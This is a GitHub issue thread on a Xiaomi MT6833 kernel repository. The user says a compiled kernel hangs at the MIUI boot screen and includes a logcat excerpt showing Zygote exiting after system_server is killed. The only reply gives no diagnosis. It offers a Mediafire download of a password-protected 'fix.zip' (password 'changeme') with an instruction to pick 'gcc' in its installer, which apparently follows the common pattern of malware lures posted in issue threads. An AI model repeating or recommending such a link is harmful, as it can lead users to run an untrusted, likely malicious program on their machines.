### ISSUE TITLE
Stuck on the second screen(MIUI)

### ISSUE THREAD

**Issue by KateWasHere001** [Xiaomi-MT6833/kernel_xiaomi_evergo#2]
hi,
I just tried to compile the source. After flashing, I found that the system stuck on the second screen, that is, MIUI appeared, the Zygote process exits through the logcat log. The following is the specific error log context. Please help, and how to make it right to start os normally.

`03-08 20:13:15.496  1167  1191 E ProcessInjector: error while reportKillProcessEvent to system server!
03-08 20:13:15.496  1167  1191 E ProcessInjector: java.lang.reflect.InvocationTargetException
03-08 20:13:15.496  1167  1191 E ProcessInjector: 	at java.lang.reflect.Method.invoke(Native Method)
03-08 20:13:15.496  1167  1191 E ProcessInjector: 	at android.os.ProcessInjector.reportKillProcessEvent(ProcessInjector.java:24)
03-08 20:13:15.496  1167  1191 E ProcessInjector: 	at android.os.Process.killProcess(Process.java:1123)
03-08 20:13:15.496  1167  1191 E ProcessInjector: 	at com.android.server.Watchdog.run(Watchdog.java:1053)
03-08 20:13:15.496  1167  1191 E ProcessInjector: Caused by: java.lang.NullPointerException: Attempt to invoke virtual method 'void miui.process.ProcessManagerInternal.recordKillProcessEventIfNeeded(java.lang.String, java.lang.String, int, java.lang.String, int)' on a null object reference
03-08 20:13:15.496  1167  1191 E ProcessInjector: 	at com.android.server.am.ProcessRecordInjector.reportKillProcessEvent(ProcessRecordInjector.java:371)
03-08 20:13:15.496  1167  1191 E ProcessInjector: 	at com.android.server.am.ProcessRecordInjector.reportKillProcessEvent(ProcessRecordInjector.java:346)
03-08 20:13:15.496  1167  1191 E ProcessInjector: 	at com.android.server.am.ActivityManagerService.reportKillProcessEvent(ActivityManagerService.java:21255)
03-08 20:13:15.496  1167  1191 E ProcessInjector: 	... 4 more
03-08 20:13:15.496  1167  1191 I Process : Sending signal. PID: 1167 SIG: 9
03-08 20:13:15.509   447   447 I lowmemorykiller: lmkd data connection dropped
03-08 20:13:15.509   447   447 I lowmemorykiller: closing lmkd data connection
03-08 20:13:15.510   607   607 E Zygote  : Zygote failed to write to system_server FD: Connection refused
03-08 20:13:15.510   607   607 I Zygote  : Process 1167 exited due to signal 9 (Killed)
03-08 20:13:15.510   607   607 E Zygote  : Exit zygote because system server (pid 1167) has terminated`

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
